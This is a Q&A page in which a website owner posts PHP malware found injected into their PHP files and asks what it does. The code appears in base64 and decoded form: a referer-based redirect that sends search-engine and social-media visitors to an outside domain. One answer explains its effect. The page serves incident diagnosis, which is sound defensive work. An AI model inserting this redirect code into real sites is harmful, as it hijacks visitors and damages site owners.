Sign Up

Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.

Have an account? Sign In

Have an account? Sign In Now

Sign In

Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.

Sign Up Here

Forgot Password?

Don't have account, Sign Up Here

Forgot Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Have an account? Sign In Now

You must login to ask a question.

Forgot Password?

Need An Account, Sign Up Here

Please briefly explain why you feel this question should be reported.

Please briefly explain why you feel this answer should be reported.

Please briefly explain why you feel this user should be reported.

Sign InSign Up

The Archive Base

The Archive Base Logo The Archive Base Logo

The Archive Base Navigation

  • Home
  • SEARCH
  • About Us
  • Blog
  • Contact Us
Search
Ask A Question

Mobile menu

Close
Ask a Question
  • Home
  • Add group
  • Groups page
  • Feed
  • User Profile
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Buy Points
  • Users
  • Help
  • Buy Theme
  • SEARCH
Home/ Questions/Q 7580415
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Editorial Team
Asked: May 30, 20262026-05-30T17:54:43+00:00 2026-05-30T17:54:43+00:00

This February 14 my website got attacked by some malware code which comes to

  • 0

This February 14 my website got attacked by some malware code which comes to my notice after google’s Action on 29th Feb But All php files have got effected with the malicious code on checking i got the following code

echo
base64_decode(“DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9”);

on decoding it become

error_reporting(0); $qazplm = headers_sent(); if (!$qazplm) {
$referer = $_SERVER[‘HTTP_REFERER’];
$uag = $_SERVER[‘HTTP_USER_AGENT’];
if ($uag) {
if (stristr($referer, “yahoo”) or stristr($referer, “bing”) or stristr($referer, “rambler”) or stristr($referer, “gogo”) or
stristr($referer, “live.com”) or stristr($referer, “aport”) or
stristr($referer, “nigma”) or stristr($referer, “webalta”) or
stristr($referer, “begun.ru”) or stristr($referer, “stumbleupon.com”)
or stristr($referer, “bit.ly”) or stristr($referer, “tinyurl.com”) or
preg_match(“/yandex.ru/yandsearch\?(.*?)\&lr\=/”, $referer) or
preg_match(“/google.(.*?)/url/”, $referer) or stristr($referer,
“myspace.com”) or stristr($referer, “facebook.com”) or
stristr($referer, “aol.com”)) {
if (!stristr($referer, “cache”) or !stristr($referer, “inurl”)) {
header(“Location: http://namesti.bee.pl/“);
exit();
}
}
} }

i dont know how it came to my server but All php files have got effected but others are fine.entire web site is down now. i Just want to know how much harm it can do And What this code does exactly. How can i detect it. Is it the script which executes on particular time.

  • 1 1 Answer
  • 0 Views
  • 0 Followers
  • 0
Share
  • Facebook
  • Report

Leave an answer
Cancel reply

You must login to add an answer.

Forgot Password?

Need An Account, Sign Up Here

1 Answer

  • Voted
  • Oldest
  • Recent
  • Random
  1. Editorial Team
    Editorial Team
    2026-05-30T17:54:45+00:00Added an answer on May 30, 2026 at 5:54 pm

    The script just attempts to redirect to namesti.bee.pl depending on whether headers have already been sent or not, and what the referer string contains.

    It doesn’t do anything else, so the harm done is on your site’s reputation more than anything else.

    • 0
    • Reply
    • Share
      Share
      • Share on Facebook
      • Share on Twitter
      • Share on LinkedIn
      • Share on WhatsApp
      • Report

Sidebar

Related Questions

I have the following C++ code which I got from google's sparsehash website: #include
This maybe a really simple question but for some reason my code isn't working.
This is my first post here and I wanted to get some input from
Let's say I have 28th of February 2010 and add one month to this
This is my full code of month calender. It also show time on today's
This code where I subtract days from a date does not get the right
here is code String[] month=new String[12]{January,February,March,April,May,June,July,August,September,Octomber,November,December}; int day = DateTime.Now.Day; int mon= DateTime.Now.Month; mon
Okay, I understand this: mm/dd/yyyy - 02/01/2003 - strtotime() returns : 1st February 2003
html Tidy gives this as output for some reason: <?xml version=1.0 encoding=utf-16?> <?xml version=1.0
I am actually using this calendar source code, but I did encountered a problem

Explore

  • Home
  • Add group
  • Groups page
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Users
  • Help
  • SEARCH

Footer

© 2021 The Archive Base. All Rights Reserved
With Love by The Archive Base

Insert/edit link

Enter the destination URL

Or link to existing content

    No search term specified. Showing recent items. Search or use up and down arrow keys to select an item.